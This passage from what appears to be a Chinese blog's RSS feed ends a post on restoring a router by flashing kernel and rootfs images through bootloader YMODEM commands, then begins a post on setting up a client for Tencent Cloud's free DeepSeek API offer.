&amp;quot;Fira Code&amp;quot;, Consolas, monospace; background-image: ; background-position-x: ; background-position-y: ; background-size: ; background-repeat: ; background-attachment: ; background-origin: ; background-clip: ; border-radius: 5px; word-break: keep-all; white-space-collapse: preserve;&quot;&gt;uImage&lt;/code&gt;&amp;nbsp;→ 校验 → 擦除&amp;nbsp;&lt;code style=&quot;margin: 0px; padding: 3px 5px; overflow-wrap: break-word; box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: &amp;quot;Cascadia Code&amp;quot;, &amp;quot;Fira Code&amp;quot;, Consolas, monospace; background-image: ; background-position-x: ; background-position-y: ; background-size: ; background-repeat: ; background-attachment: ; background-origin: ; background-clip: ; border-radius: 5px; word-break: keep-all; white-space-collapse: preserve;&quot;&gt;k0&lt;/code&gt;&amp;nbsp;分区 → 写入内核。&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;对应分区：&lt;code style=&quot;margin: 0px; padding: 3px 5px; overflow-wrap: break-word; box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: &amp;quot;Cascadia Code&amp;quot;, &amp;quot;Fira Code&amp;quot;, Consolas, monospace; background-image: ; background-position-x: ; background-position-y: ; background-size: ; background-repeat: ; background-attachment: ; background-origin: ; background-clip: ; border-radius: 5px; word-break: keep-all; white-space-collapse: preserve;&quot;&gt;k0&lt;/code&gt;&amp;nbsp;(地址&amp;nbsp;&lt;code style=&quot;margin: 0px; padding: 3px 5px; overflow-wrap: break-word; box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: &amp;quot;Cascadia Code&amp;quot;, &amp;quot;Fira Code&amp;quot;, Consolas, monospace; background-image: ; background-position-x: ; background-position-y: ; background-size: ; background-repeat: ; background-attachment: ; background-origin: ; background-clip: ; border-radius: 5px; word-break: keep-all; white-space-collapse: preserve;&quot;&gt;0x80000&lt;/code&gt;，大小&amp;nbsp;&lt;code style=&quot;margin: 0px; padding: 3px 5px; overflow-wrap: break-word; box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: &amp;quot;Cascadia Code&amp;quot;, &amp;quot;Fira Code&amp;quot;, Consolas, monospace; background-image: ; background-position-x: ; background-position-y: ; background-size: ; background-repeat: ; background-attachment: ; background-origin: ; background-clip: ; border-radius: 5px; word-break: keep-all; white-space-collapse: preserve;&quot;&gt;3MB&lt;/code&gt;)。&lt;/p&gt;&lt;/li&gt;&lt;/ul&gt;&lt;li&gt;&lt;p style=&quot;margin-top: 0px; padding: 0px; overflow-wrap: break-word; box-sizing: border-box; -webkit-tap-highlight-color: transparent; white-space-collapse: preserve;&quot;&gt;&lt;strong style=&quot;margin: 0px; padding: 0px; overflow-wrap: break-word; box-sizing: border-box; -webkit-tap-highlight-color: transparent;&quot;&gt;&lt;code style=&quot;margin: 0px; padding: 3px 5px; overflow-wrap: break-word; box-sizing: border-box; font-weight: normal; -webkit-tap-highlight-color: transparent; font-family: &amp;quot;Cascadia Code&amp;quot;, &amp;quot;Fira Code&amp;quot;, Consolas, monospace; background-image: ; background-position-x: ; background-position-y: ; background-size: ; background-repeat: ; background-attachment: ; background-origin: ; background-clip: ; border-radius: 5px; word-break: keep-all;&quot;&gt;run yr&lt;/code&gt;&lt;/strong&gt;&lt;/p&gt;&lt;/li&gt;&lt;ul style=&quot;list-style-type: circle;&quot; class=&quot; list-paddingleft-2&quot;&gt;&lt;li&gt;&lt;p&gt;流程：通过YMODEM接收&amp;nbsp;&lt;code style=&quot;margin: 0px; padding: 3px 5px; overflow-wrap: break-word; box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: &amp;quot;Cascadia Code&amp;quot;, &amp;quot;Fira Code&amp;quot;, Consolas, monospace; background-image: ; background-position-x: ; background-position-y: ; background-size: ; background-repeat: ; background-attachment: ; background-origin: ; background-clip: ; border-radius: 5px; word-break: keep-all; white-space-collapse: preserve;&quot;&gt;rootfs&lt;/code&gt;&amp;nbsp;→ 校验 → 擦除&amp;nbsp;&lt;code style=&quot;margin: 0px; padding: 3px 5px; overflow-wrap: break-word; box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: &amp;quot;Cascadia Code&amp;quot;, &amp;quot;Fira Code&amp;quot;, Consolas, monospace; background-image: ; background-position-x: ; background-position-y: ; background-size: ; background-repeat: ; background-attachment: ; background-origin: ; background-clip: ; border-radius: 5px; word-break: keep-all; white-space-collapse: preserve;&quot;&gt;r0&lt;/code&gt;&amp;nbsp;分区 → 写入根文件系统。&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;对应分区：&lt;code style=&quot;margin: 0px; padding: 3px 5px; overflow-wrap: break-word; box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: &amp;quot;Cascadia Code&amp;quot;, &amp;quot;Fira Code&amp;quot;, Consolas, monospace; background-image: ; background-position-x: ; background-position-y: ; background-size: ; background-repeat: ; background-attachment: ; background-origin: ; background-clip: ; border-radius: 5px; word-break: keep-all; white-space-collapse: preserve;&quot;&gt;r0&lt;/code&gt;&amp;nbsp;(地址&amp;nbsp;&lt;code style=&quot;margin: 0px; padding: 3px 5px; overflow-wrap: break-word; box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: &amp;quot;Cascadia Code&amp;quot;, &amp;quot;Fira Code&amp;quot;, Consolas, monospace; background-image: ; background-position-x: ; background-position-y: ; background-size: ; background-repeat: ; background-attachment: ; background-origin: ; background-clip: ; border-radius: 5px; word-break: keep-all; white-space-collapse: preserve;&quot;&gt;0x380000&lt;/code&gt;，大小&amp;nbsp;&lt;code style=&quot;margin: 0px; padding: 3px 5px; overflow-wrap: break-word; box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: &amp;quot;Cascadia Code&amp;quot;, &amp;quot;Fira Code&amp;quot;, Consolas, monospace; background-image: ; background-position-x: ; background-position-y: ; background-size: ; background-repeat: ; background-attachment: ; background-origin: ; background-clip: ; border-radius: 5px; word-break: keep-all; white-space-collapse: preserve;&quot;&gt;4.75MB&lt;/code&gt;)。&lt;/p&gt;&lt;/li&gt;&lt;/ul&gt;&lt;li&gt;&lt;p style=&quot;margin-top: 0px; padding: 0px; overflow-wrap: break-word; box-sizing: border-box; -webkit-tap-highlight-color: transparent; white-space-collapse: preserve;&quot;&gt;&lt;strong style=&quot;margin: 0px; padding: 0px; overflow-wrap: break-word; box-sizing: border-box; -webkit-tap-highlight-color: transparent;&quot;&gt;&lt;code style=&quot;margin: 0px; padding: 3px 5px; overflow-wrap: break-word; box-sizing: border-box; font-weight: normal; -webkit-tap-highlight-color: transparent; font-family: &amp;quot;Cascadia Code&amp;quot;, &amp;quot;Fira Code&amp;quot;, Consolas, monospace; background-image: ; background-position-x: ; background-position-y: ; background-size: ; background-repeat: ; background-attachment: ; background-origin: ; background-clip: ; border-radius: 5px; word-break: keep-all;&quot;&gt;sw_active&lt;/code&gt; 变量&lt;/strong&gt;&lt;/p&gt;&lt;/li&gt;&lt;ul style=&quot;list-style-type: circle;&quot; class=&quot; list-paddingleft-2&quot;&gt;&lt;li&gt;&lt;p&gt;&lt;code style=&quot;margin: 0px; padding: 3px 5px; overflow-wrap: break-word; box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: &amp;quot;Cascadia Code&amp;quot;, &amp;quot;Fira Code&amp;quot;, Consolas, monospace; background-image: ; background-position-x: ; background-position-y: ; background-size: ; background-repeat: ; background-attachment: ; background-origin: ; background-clip: ; border-radius: 5px; word-break: keep-all; white-space-collapse: preserve;&quot;&gt;sw_active=0&lt;/code&gt;: 从镜像0（&lt;code style=&quot;margin: 0px; padding: 3px 5px; overflow-wrap: break-word; box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: &amp;quot;Cascadia Code&amp;quot;, &amp;quot;Fira Code&amp;quot;, Consolas, monospace; background-image: ; background-position-x: ; background-position-y: ; background-size: ; background-repeat: ; background-attachment: ; background-origin: ; background-clip: ; border-radius: 5px; word-break: keep-all; white-space-collapse: preserve;&quot;&gt;k0/r0&lt;/code&gt;）启动。&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;&lt;code style=&quot;margin: 0px; padding: 3px 5px; overflow-wrap: break-word; box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: &amp;quot;Cascadia Code&amp;quot;, &amp;quot;Fira Code&amp;quot;, Consolas, monospace; background-image: ; background-position-x: ; background-position-y: ; background-size: ; background-repeat: ; background-attachment: ; background-origin: ; background-clip: ; border-radius: 5px; word-break: keep-all; white-space-collapse: preserve;&quot;&gt;sw_active=1&lt;/code&gt;: 从镜像1（&lt;code style=&quot;margin: 0px; padding: 3px 5px; overflow-wrap: break-word; box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: &amp;quot;Cascadia Code&amp;quot;, &amp;quot;Fira Code&amp;quot;, Consolas, monospace; background-image: ; background-position-x: ; background-position-y: ; background-size: ; background-repeat: ; background-attachment: ; background-origin: ; background-clip: ; border-radius: 5px; word-break: keep-all; white-space-collapse: preserve;&quot;&gt;k1/r1&lt;/code&gt;）启动。&lt;/p&gt;&lt;/li&gt;&lt;/ul&gt;&lt;/ul&gt;&lt;hr style=&quot;margin: 20px 0px; padding: 0px; overflow-wrap: break-word; box-sizing: border-box; -webkit-tap-highlight-color: transparent; border-right: none; border-bottom: none; border-left: none; border-image: initial; border-top: 0.5px solid var(--color-border); font-family: Ubuntu, -apple-system, BlinkMacSystemFont, &amp;quot;Segoe UI&amp;quot;, Roboto, Oxygen, Cantarell, &amp;quot;Open Sans&amp;quot;, &amp;quot;Helvetica Neue&amp;quot;, sans-serif;&quot;/&gt;&lt;h3 style=&quot;margin: 1em 0px; padding: 0px; overflow-wrap: break-word; box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: -apple-system, BlinkMacSystemFont, &amp;quot;Segoe UI&amp;quot;, Roboto, Oxygen, Ubuntu, Cantarell, &amp;quot;Open Sans&amp;quot;, &amp;quot;Helvetica Neue&amp;quot;, sans-serif; font-size: 1.2em;&quot;&gt;&lt;strong style=&quot;margin: 0px; padding: 0px; overflow-wrap: break-word; box-sizing: border-box; -webkit-tap-highlight-color: transparent;&quot;&gt;四、注意事项&lt;/strong&gt;&lt;/h3&gt;&lt;ol style=&quot;margin-top: 1em; margin-bottom: 1em; padding: 0px 0px 0px 1.5em; overflow-wrap: break-word; box-sizing: border-box; -webkit-tap-highlight-color: transparent;&quot; class=&quot; list-paddingleft-2&quot;&gt;&lt;li&gt;&lt;p style=&quot;margin-top: 0px; padding: 0px; overflow-wrap: break-word; box-sizing: border-box; -webkit-tap-highlight-color: transparent; white-space-collapse: preserve;&quot;&gt;&lt;strong style=&quot;margin: 0px; padding: 0px; overflow-wrap: break-word; box-sizing: border-box; -webkit-tap-highlight-color: transparent;&quot;&gt;文件大小限制&lt;/strong&gt;&lt;/p&gt;&lt;/li&gt;&lt;ul style=&quot;list-style-type: initial;&quot; class=&quot; list-paddingleft-2&quot;&gt;&lt;li&gt;&lt;p&gt;&lt;code style=&quot;margin: 0px; padding: 3px 5px; overflow-wrap: break-word; box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: &amp;quot;Cascadia Code&amp;quot;, &amp;quot;Fira Code&amp;quot;, Consolas, monospace; background-image: ; background-position-x: ; background-position-y: ; background-size: ; background-repeat: ; background-attachment: ; background-origin: ; background-clip: ; border-radius: 5px; word-break: keep-all; white-space-collapse: preserve;&quot;&gt;uImage&lt;/code&gt;&amp;nbsp;必须 ≤&amp;nbsp;&lt;code style=&quot;margin: 0px; padding: 3px 5px; overflow-wrap: break-word; box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: &amp;quot;Cascadia Code&amp;quot;, &amp;quot;Fira Code&amp;quot;, Consolas, monospace; background-image: ; background-position-x: ; background-position-y: ; background-size: ; background-repeat: ; background-attachment: ; background-origin: ; background-clip: ; border-radius: 5px; word-break: keep-all; white-space-collapse: preserve;&quot;&gt;3MB&lt;/code&gt;，&lt;code style=&quot;margin: 0px; padding: 3px 5px; overflow-wrap: break-word; box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: &amp;quot;Cascadia Code&amp;quot;, &amp;quot;Fira Code&amp;quot;, Consolas, monospace; background-image: ; background-position-x: ; background-position-y: ; background-size: ; background-repeat: ; background-attachment: ; background-origin: ; background-clip: ; border-radius: 5px; word-break: keep-all; white-space-collapse: preserve;&quot;&gt;rootfs&lt;/code&gt;&amp;nbsp;必须 ≤&amp;nbsp;&lt;code style=&quot;margin: 0px; padding: 3px 5px; overflow-wrap: break-word; box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: &amp;quot;Cascadia Code&amp;quot;, &amp;quot;Fira Code&amp;quot;, Consolas, monospace; background-image: ; background-position-x: ; background-position-y: ; background-size: ; background-repeat: ; background-attachment: ; background-origin: ; background-clip: ; border-radius: 5px; word-break: keep-all; white-space-collapse: preserve;&quot;&gt;4.75MB&lt;/code&gt;，否则写入会失败。&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;可通过&amp;nbsp;&lt;code style=&quot;margin: 0px; padding: 3px 5px; overflow-wrap: break-word; box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: &amp;quot;Cascadia Code&amp;quot;, &amp;quot;Fira Code&amp;quot;, Consolas, monospace; background-image: ; background-position-x: ; background-position-y: ; background-size: ; background-repeat: ; background-attachment: ; background-origin: ; background-clip: ; border-radius: 5px; word-break: keep-all; white-space-collapse: preserve;&quot;&gt;ls -l&lt;/code&gt;&amp;nbsp;检查文件大小是否符合。&lt;/p&gt;&lt;/li&gt;&lt;/ul&gt;&lt;li&gt;&lt;p style=&quot;margin-top: 0px; padding: 0px; overflow-wrap: break-word; box-sizing: border-box; -webkit-tap-highlight-color: transparent; white-space-collapse: preserve;&quot;&gt;&lt;strong style=&quot;margin: 0px; padding: 0px; overflow-wrap: break-word; box-sizing: border-box; -webkit-tap-highlight-color: transparent;&quot;&gt;传输中断处理&lt;/strong&gt;&lt;/p&gt;&lt;/li&gt;&lt;ul style=&quot;list-style-type: initial;&quot; class=&quot; list-paddingleft-2&quot;&gt;&lt;li&gt;&lt;p&gt;如果YMODEM传输中断，需重新执行&amp;nbsp;&lt;code style=&quot;margin: 0px; padding: 3px 5px; overflow-wrap: break-word; box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: &amp;quot;Cascadia Code&amp;quot;, &amp;quot;Fira Code&amp;quot;, Consolas, monospace; background-image: ; background-position-x: ; background-position-y: ; background-size: ; background-repeat: ; background-attachment: ; background-origin: ; background-clip: ; border-radius: 5px; word-break: keep-all; white-space-collapse: preserve;&quot;&gt;run yk&lt;/code&gt;&amp;nbsp;或&amp;nbsp;&lt;code style=&quot;margin: 0px; padding: 3px 5px; overflow-wrap: break-word; box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: &amp;quot;Cascadia Code&amp;quot;, &amp;quot;Fira Code&amp;quot;, Consolas, monospace; background-image: ; background-position-x: ; background-position-y: ; background-size: ; background-repeat: ; background-attachment: ; background-origin: ; background-clip: ; border-radius: 5px; word-break: keep-all; white-space-collapse: preserve;&quot;&gt;run yr&lt;/code&gt;。&lt;/p&gt;&lt;/li&gt;&lt;/ul&gt;&lt;li&gt;&lt;p style=&quot;margin-top: 0px; padding: 0px; overflow-wrap: break-word; font-family: Ubuntu, -apple-system, BlinkMacSystemFont, &amp;quot;Segoe UI&amp;quot;, Roboto, Oxygen, Cantarell, &amp;quot;Open Sans&amp;quot;, &amp;quot;Helvetica Neue&amp;quot;, sans-serif; box-sizing: border-box; -webkit-tap-highlight-color: transparent; white-space-collapse: preserve;&quot;&gt;&lt;strong style=&quot;margin: 0px; padding: 0px; overflow-wrap: break-word; box-sizing: border-box; -webkit-tap-highlight-color: transparent;&quot;&gt;版本兼容性&lt;/strong&gt;&lt;/p&gt;&lt;/li&gt;&lt;ul style=&quot;list-style-type: initial;&quot; class=&quot; list-paddingleft-2&quot;&gt;&lt;li&gt;&lt;p&gt;确保&amp;nbsp;&lt;code style=&quot;margin: 0px; padding: 3px 5px; overflow-wrap: break-word; box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: &amp;quot;Cascadia Code&amp;quot;, &amp;quot;Fira Code&amp;quot;, Consolas, monospace; background-image: ; background-position-x: ; background-position-y: ; background-size: ; background-repeat: ; background-attachment: ; background-origin: ; background-clip: ; border-radius: 5px; word-break: keep-all; white-space-collapse: preserve;&quot;&gt;uImage&lt;/code&gt;&amp;nbsp;和&amp;nbsp;&lt;code style=&quot;margin: 0px; padding: 3px 5px; overflow-wrap: break-word; box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: &amp;quot;Cascadia Code&amp;quot;, &amp;quot;Fira Code&amp;quot;, Consolas, monospace; background-image: ; background-position-x: ; background-position-y: ; background-size: ; background-repeat: ; background-attachment: ; background-origin: ; background-clip: ; border-radius: 5px; word-break: keep-all; white-space-collapse: preserve;&quot;&gt;rootfs&lt;/code&gt;&amp;nbsp;与硬件版本（&lt;code style=&quot;margin: 0px; padding: 3px 5px; overflow-wrap: break-word; box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: &amp;quot;Cascadia Code&amp;quot;, &amp;quot;Fira Code&amp;quot;, Consolas, monospace; background-image: ; background-position-x: ; background-position-y: ; background-size: ; background-repeat: ; background-attachment: ; background-origin: ; background-clip: ; border-radius: 5px; word-break: keep-all; white-space-collapse: preserve;&quot;&gt;hw_ver&lt;/code&gt;）匹配。&lt;/p&gt;&lt;/li&gt;&lt;/ul&gt;&lt;/ol&gt;&lt;p&gt;&lt;span style=&quot;color:#000000;font-family:Ubuntu, -apple-system, BlinkMacSystemFont, Segoe UI, Roboto, Oxygen, Cantarell, Open Sans, Helvetica Neue, sans-serif;margin: 0px; padding: 0px; overflow-wrap: break-word;&quot;&gt;如上操作完，重启后所有灯都凉了，电脑网卡也提示插入了&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;color:#000000;font-family:Ubuntu, -apple-system, BlinkMacSystemFont, Segoe UI, Roboto, Oxygen, Cantarell, Open Sans, Helvetica Neue, sans-serif;margin: 0px; padding: 0px; overflow-wrap: break-word;&quot;&gt;&lt;img data-width=&quot;335&quot; data-height=&quot;329&quot; src=&quot;https://www.qxhut.cn/zb_users/upload/2025/02/202502111739267192422798.jpg&quot; alt=&quot;1739267185757.jpg&quot;/&gt;&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;&lt;p&gt;&lt;span style=&quot;color:#000000;font-family:Ubuntu, -apple-system, BlinkMacSystemFont, Segoe UI, Roboto, Oxygen, Cantarell, Open Sans, Helvetica Neue, sans-serif;margin: 0px; padding: 0px; overflow-wrap: break-word;&quot;&gt;&lt;/span&gt;&lt;/p&gt;&lt;p style=&quot;margin: 0px; padding: 0px; overflow-wrap: break-word;&quot;&gt;电脑修改网卡属性&lt;/p&gt;&lt;p style=&quot;margin: 0px; padding: 0px; overflow-wrap: break-word;&quot;&gt;&lt;img data-width=&quot;1046&quot; data-height=&quot;172&quot; src=&quot;https://www.qxhut.cn/zb_users/upload/2025/02/202502111739267205115252.jpg&quot; alt=&quot;1739267202709.jpg&quot;/&gt;&lt;/p&gt;&lt;p style=&quot;margin: 0px; padding: 0px; overflow-wrap: break-word;&quot;&gt;修改IPV4的 地址为静态&lt;/p&gt;&lt;p style=&quot;margin: 0px; padding: 0px; overflow-wrap: break-word;&quot;&gt;&lt;img data-width=&quot;883&quot; data-height=&quot;566&quot; src=&quot;https://www.qxhut.cn/zb_users/upload/2025/02/202502111739267218137534.jpg&quot; alt=&quot;1739267213395.jpg&quot;/&gt;&lt;/p&gt;&lt;div style=&quot;margin: 0px; padding: 0px; overflow-wrap: break-word;&quot;&gt;&lt;p&gt;浏览器输入192.168.1.1&lt;/p&gt;&lt;p&gt;&lt;img data-width=&quot;1126&quot; data-height=&quot;416&quot; src=&quot;https://www.qxhut.cn/zb_users/upload/2025/02/202502111739267232644993.jpg&quot; alt=&quot;1739267228968.jpg&quot;/&gt;&lt;/p&gt;&lt;p&gt;激动的心，颤抖的手，活了&lt;/p&gt;&lt;p&gt;输入账号密码 成功进入&lt;/p&gt;&lt;p&gt;&lt;img data-width=&quot;818&quot; data-height=&quot;607&quot; src=&quot;https://www.qxhut.cn/zb_users/upload/2025/02/202502111739267279459124.png&quot; alt=&quot;1739267256528.png&quot;/&gt;&lt;/p&gt;&lt;/div&gt;&lt;p&gt;&lt;br/&gt;&lt;/p&gt;</description><pubDate>Tue, 11 Feb 2025 17:42:20 +0800</pubDate></item><item><title>腾讯云掏出671B核弹级模型白送：DeepSeek-V3/R1无限免费调用</title><link>https://www.qxhut.cn/?id=45</link><description>&lt;p style=&quot;box-sizing: border-box; border-width: 0px; border-style: solid; border-color: hsl(var(--border)); margin: 1.5em 8px; text-align: justify; line-height: 1.75; letter-spacing: 0.1em; color: rgb(63, 63, 63);&quot;&gt;&lt;span leaf=&quot;&quot;&gt;官方的 deepseek 到目前为止都不是很稳定，经常出现 &amp;quot;服务器繁忙，请稍后再试。&amp;quot; 的情况。&lt;/span&gt;&lt;/p&gt;&lt;p style=&quot;box-sizing: border-box; border-width: 0px; border-style: solid; border-color: hsl(var(--border)); margin: 1.5em 8px; text-align: justify; line-height: 1.75; font-family: -apple-system-font, BlinkMacSystemFont, &amp;quot;Helvetica Neue&amp;quot;, &amp;quot;PingFang SC&amp;quot;, &amp;quot;Hiragino Sans GB&amp;quot;, &amp;quot;Microsoft YaHei UI&amp;quot;, &amp;quot;Microsoft YaHei&amp;quot;, Arial, sans-serif; letter-spacing: 0.1em; color: rgb(63, 63, 63);&quot;&gt;&lt;br/&gt;&lt;/p&gt;&lt;p style=&quot;box-sizing: border-box; border-width: 0px; border-style: solid; border-color: hsl(var(--border)); margin: 1.5em 8px; text-align: justify; line-height: 1.75; font-family: -apple-system-font, BlinkMacSystemFont, &amp;quot;Helvetica Neue&amp;quot;, &amp;quot;PingFang SC&amp;quot;, &amp;quot;Hiragino Sans GB&amp;quot;, &amp;quot;Microsoft YaHei UI&amp;quot;, &amp;quot;Microsoft YaHei&amp;quot;, Arial, sans-serif; letter-spacing: 0.1em; color: rgb(63, 63, 63);&quot;&gt;&lt;span leaf=&quot;&quot;&gt;今天看到腾讯云限时免费调用 deepseek 系列的模型，具体如下：&lt;/span&gt;&lt;/p&gt;&lt;ul style=&quot;list-style-type: none;&quot; class=&quot; list-paddingleft-2&quot;&gt;&lt;li&gt;&lt;section&gt;&lt;span leaf=&quot;&quot;&gt;• DeepSeek-V3 为 671B 参数 MoE 模型&lt;/span&gt;&lt;/section&gt;&lt;/li&gt;&lt;li&gt;&lt;section&gt;&lt;span leaf=&quot;&quot;&gt;• DeepSeek-R1 为 671B 模型&lt;/span&gt;&lt;/section&gt;&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;&lt;/p&gt;&lt;figure style=&quot;box-sizing: border-box; border-width: 0px; border-style: solid; border-color: hsl(var(--border)); margin: 1.5em 8px; line-height: 1.75; font-family: -apple-system-font, BlinkMacSystemFont, &amp;quot;Helvetica Neue&amp;quot;, &amp;quot;PingFang SC&amp;quot;, &amp;quot;Hiragino Sans GB&amp;quot;, &amp;quot;Microsoft YaHei UI&amp;quot;, &amp;quot;Microsoft YaHei&amp;quot;, Arial, sans-serif; color: rgb(63, 63, 63);&quot;&gt;&lt;span leaf=&quot;&quot;&gt;&lt;/span&gt;&lt;figcaption style=&quot;box-sizing: border-box; border-width: 0px; border-style: solid; border-color: hsl(var(--border)); text-align: center; line-height: 1.75; font-size: 0.8em; color: rgb(136, 136, 136);&quot;&gt;&lt;img data-width=&quot;1024&quot; data-height=&quot;643&quot; src=&quot;https://www.qxhut.cn/zb_users/upload/2025/02/202502111739242787232065.png&quot; alt=&quot;1739242783694.png&quot;/&gt;&lt;br/&gt;&lt;/figcaption&gt;&lt;/figure&gt;&lt;p&gt;&lt;/p&gt;&lt;p style=&quot;box-sizing: border-box; border-width: 0px; border-style: solid; border-color: hsl(var(--border)); margin: 1.5em 8px; text-align: justify; line-height: 1.75; font-family: -apple-system-font, BlinkMacSystemFont, &amp;quot;Helvetica Neue&amp;quot;, &amp;quot;PingFang SC&amp;quot;, &amp;quot;Hiragino Sans GB&amp;quot;, &amp;quot;Microsoft YaHei UI&amp;quot;, &amp;quot;Microsoft YaHei&amp;quot;, Arial, sans-serif; letter-spacing: 0.1em; color: rgb(63, 63, 63);&quot;&gt;&lt;span leaf=&quot;&quot;&gt;也就是说在 2025年2月25日23时59分59秒，我们去调用腾讯云为我们提供的 deepseek 模型都免费。&lt;/span&gt;&lt;/p&gt;&lt;p style=&quot;box-sizing: border-box; border-width: 0px; border-style: solid; border-color: hsl(var(--border)); margin: 1.5em 8px; text-align: justify; line-height: 1.75; font-family: -apple-system-font, BlinkMacSystemFont, &amp;quot;Helvetica Neue&amp;quot;, &amp;quot;PingFang SC&amp;quot;, &amp;quot;Hiragino Sans GB&amp;quot;, &amp;quot;Microsoft YaHei UI&amp;quot;, &amp;quot;Microsoft YaHei&amp;quot;, Arial, sans-serif; letter-spacing: 0.1em; color: rgb(63, 63, 63);&quot;&gt;&lt;span leaf=&quot;&quot;&gt;本篇文章的内容大概就是手把手教大家在本地搭建一个客户端，能够使用腾讯云的 deepseek 模型。&lt;/span&gt;&lt;/p&gt;&lt;h1 style=&quot;box-sizing: border-box; border-width: 0px 0px 2px; border-style: solid; border-bottom-color: rgb(15, 76, 129); font-size: 19.6px; margin: 2em auto 1em; text-align: center; line-height: 1.75; font-family: -apple-system-font, BlinkMacSystemFont, &amp;quot;Helvetica Neue&amp;quot;, &amp;quot;PingFang SC&amp;quot;, &amp;quot;Hiragino Sans GB&amp;quot;, &amp;quot;Microsoft YaHei UI&amp;quot;, &amp;quot;Microsoft YaHei&amp;quot;, Arial, sans-serif; display: table; padding: 0.5em 1em; color: rgb(63, 63, 63); text-shadow: rgba(0, 0, 0, 0.1) 2px 2px 4px;&quot;&gt;&lt;span leaf=&quot;&quot;&gt;具体的步骤&lt;/span&gt;&lt;/h1&gt;&lt;h2 style=&quot;box-sizing: border-box; border-width: 0px; border-style: solid; border-color: hsl(var(--border)); font-size: 18.2px; margin: 4em auto 2em; text-align: center; line-height: 1.75; font-family: -apple-system-font, BlinkMacSystemFont, &amp;quot;Helvetica Neue&amp;quot;, &amp;quot;PingFang SC&amp;quot;, &amp;quot;Hiragino Sans GB&amp;quot;, &amp;quot;Microsoft YaHei UI&amp;quot;, &amp;quot;Microsoft YaHei&amp;quot;, Arial, sans-serif; display: table; padding: 0.3em 1em; color: rgb(255, 255, 255); background: rgb(15, 76, 129); border-radius: 8px; box-shadow: rgba(0, 0, 0, 0.1) 0px 4px 6px;&quot;&gt;&lt;span leaf=&quot;&quot;&gt;1. 准备一个腾讯云账号&lt;/span&gt;&lt;/h2&gt;&lt;p style=&quot;box-sizing: border-box; border-width: 0px; border-style: solid; border-color: hsl(var(--border)); margin: 1.5em 8px; text-align: justify; line-height: 1.75; font-family: -apple-system-font, BlinkMacSystemFont, &amp;quot;Helvetica Neue&amp;quot;, &amp;quot;PingFang SC&amp;quot;, &amp;quot;Hiragino Sans GB&amp;quot;, &amp;quot;Microsoft YaHei UI&amp;quot;, &amp;quot;Microsoft YaHei&amp;quot;, Arial, sans-serif; letter-spacing: 0.1em; color: rgb(63, 63, 63);&quot;&gt;&lt;span leaf=&quot;&quot;&gt;需要使用腾讯云的服务，当然首先需要一个腾讯云的账号，这一步我们直接去腾讯云官网，然后使用微信扫码登录即可。&lt;/span&gt;&lt;/p&gt;&lt;p style=&quot;box-sizing: border-box; border-width: 0px; border-style: solid; border-color: hsl(var(--border)); margin: 1.5em 8px; text-align: justify; line-height: 1.75; font-family: -apple-system-font, BlinkMacSystemFont, &amp;quot;Helvetica Neue&amp;quot;, &amp;quot;PingFang SC&amp;quot;, &amp;quot;Hiragino Sans GB&amp;quot;, &amp;quot;Microsoft YaHei UI&amp;quot;, &amp;quot;Microsoft YaHei&amp;quot;, Arial, sans-serif; letter-spacing: 0.1em; color: rgb(63, 63, 63);&quot;&gt;&lt;span leaf=&quot;&quot;&gt;腾讯云官网地址：https://cloud.tencent.com/&lt;/span&gt;&lt;/p&gt;&lt;p style=&quot;box-sizing: border-box; border-width: 0px; border-style: solid; border-color: hsl(var(--border)); margin: 1.5em 8px; text-align: justify; line-height: 1.75; font-family: -apple-system-font, BlinkMacSystemFont, &amp;quot;Helvetica Neue&amp;quot;, &amp;quot;PingFang SC&amp;quot;, &amp;quot;Hiragino Sans GB&amp;quot;, &amp;quot;Microsoft YaHei UI&amp;quot;, &amp;quot;Microsoft YaHei&amp;quot;, Arial, sans-serif; letter-spacing: 0.1em; color: rgb(63, 63, 63);&quot;&gt;&lt;span leaf=&quot;&quot;&gt;注册之后进入到这个链接：https://console.cloud.tencent.com/lkeap&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;img data-width=&quot;885&quot; data-height=&quot;549&quot; src=&quot;https://www.qxhut.cn/zb_users/upload/2025/02/202502111739242819710743.png&quot; alt=&quot;1739242817625.png&quot;/&gt;&lt;/p&gt;&lt;p style=&quot;box-sizing: border-box; border-width: 0px; border-style: solid; border-color: hsl(var(--border)); margin: 1.5em 8px; text-align: justify; line-height: 1.75; font-family: -apple-system-font, BlinkMacSystemFont, &amp;quot;Helvetica Neue&amp;quot;, &amp;quot;PingFang SC&amp;quot;, &amp;quot;Hiragino Sans GB&amp;quot;, &amp;quot;Microsoft YaHei UI&amp;quot;, &amp;quot;Microsoft YaHei&amp;quot;, Arial, sans-serif; letter-spacing: 0.1em; color: rgb(63, 63, 63);&quot;&gt;&lt;span 